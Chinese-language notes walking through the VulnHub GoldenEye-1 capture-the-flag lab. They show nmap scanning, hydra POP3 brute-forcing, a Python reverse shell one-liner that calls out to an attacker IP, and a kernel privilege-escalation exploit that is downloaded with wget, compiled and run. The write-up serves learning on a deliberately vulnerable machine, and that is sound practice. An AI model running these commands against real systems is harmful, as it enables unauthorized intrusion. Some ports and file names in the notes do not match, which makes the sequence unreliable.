VulnHub-GoldenEye-1 靶场渗透测试笔记

VulnHub-GoldenEye-1 靶场渗透测试笔记

参考地址：https://www.freebuf.com/articles/web/260592.html
靶场信息：
地址：https://www.vulnhub.com/entry/goldeneye-1,240/
发布日期：2018年5月4日
目标：得到root权限并且找到flag.txt
难度：中级（CTF）

一、信息收集
1.主机发现
nmap -sP 192.168.1.0/24
nmap -sS -p80 192.168.1.0/24 //半连接扫描
2.端口扫描
nmap -sS -sV -T5 -A -p- ip //攻击模式
3.
echo "natalya boris" > user.txt //快速写入文件

4.
hydra命令参数 //九头蛇，爆破工具
-s：指定端口
192.168.1.170：ip地址不加参数 直接写
pop3：服务名字不加参数 直接写
-L：字典文件
-v：显示详细信息
hydra 192.168.1.169 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

这里我遇到一个坑，-L 大写的L是指一个文件，小写的l 是指定一个用户名。

5.
使用nc连接pop3服务，登录这两个账号查看邮箱里面的邮件信息

命令：nc 192.168.1.170 55007
user boris 登录用户名
pass secret1! 登录密码
list 查看邮件列表及邮件大小
retr m 查看第m个邮件内容
quit 退出

6.设置系统hosts文件 设置域名和ip 绑定
/etc/hosts.

7.分析图片
使用strings 查看图片信息
也可以使用exiftool工具查看图片
例：strings 图片路径

8.使用wappalyzer 插件进行信息收集
得到的信息有cms类型与版本moodle 2.2.3，
这个挺有用的

二、漏洞探测
在exploit-db 搜索到相关远程命令执行漏洞
在msf 中搜索moodle漏洞，命令：
msf> search moodle
发现有远程命令执行漏洞CVE-2013-3630
需要注意，msf版本过高，在这里会利用识别，有可能是msf会自动把域名转换为ip
searchsploit moodle //这个应该也可以

三、漏洞利用
这里利用python 反弹shell,
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.28",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
远控端：
nc -lvp 4444
当我运行id命令时，它表明该用户不是root用户，这是www-data的低特权用户

接收到shell后：
使用ptyhon获得tty，不然有些命令无法执行
python -c 'import pty; pty.spawn("/bin/bash")' //有时候不用也可以吧

四、提权
1.根据前面得到的内核版本在exploit-db搜索exp（与MSF的shell里面提权操作一样）
uname -a //查看内核
命令：searchsploit Linux ubuntu 3.13.0
前往payload 的地址：cd /usr/share/exploitdb/exploits/+(payload后面的地址)
这里利用 linux/local/337292.c 这个payload

2.在kali 里面搭建http 服务进行exp文件传输
python -m http.server 8000

3.在反弹的shell 中切换到 tmp 目录进行操作
tmp目录权限高，为777 方便读写

4.下载exp

www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ gcc -v 报错说明没有gcc编译器
www-data@ubuntu:/tmp$ cc -v 存在cc编译器

由于exp里面使用gcc 编译，所以修改一下，将37292.c中的gcc改为cc
下载：
wget http://192.168.31.28:8000/37292.c
编译：
cc 37292.c -o 37292 //-o 输出名字
./37292 //开始运行即可提权成功

五、flag
cd /root //一般都在root目录下
ls //没有发现flat
ls -al //列车所有文件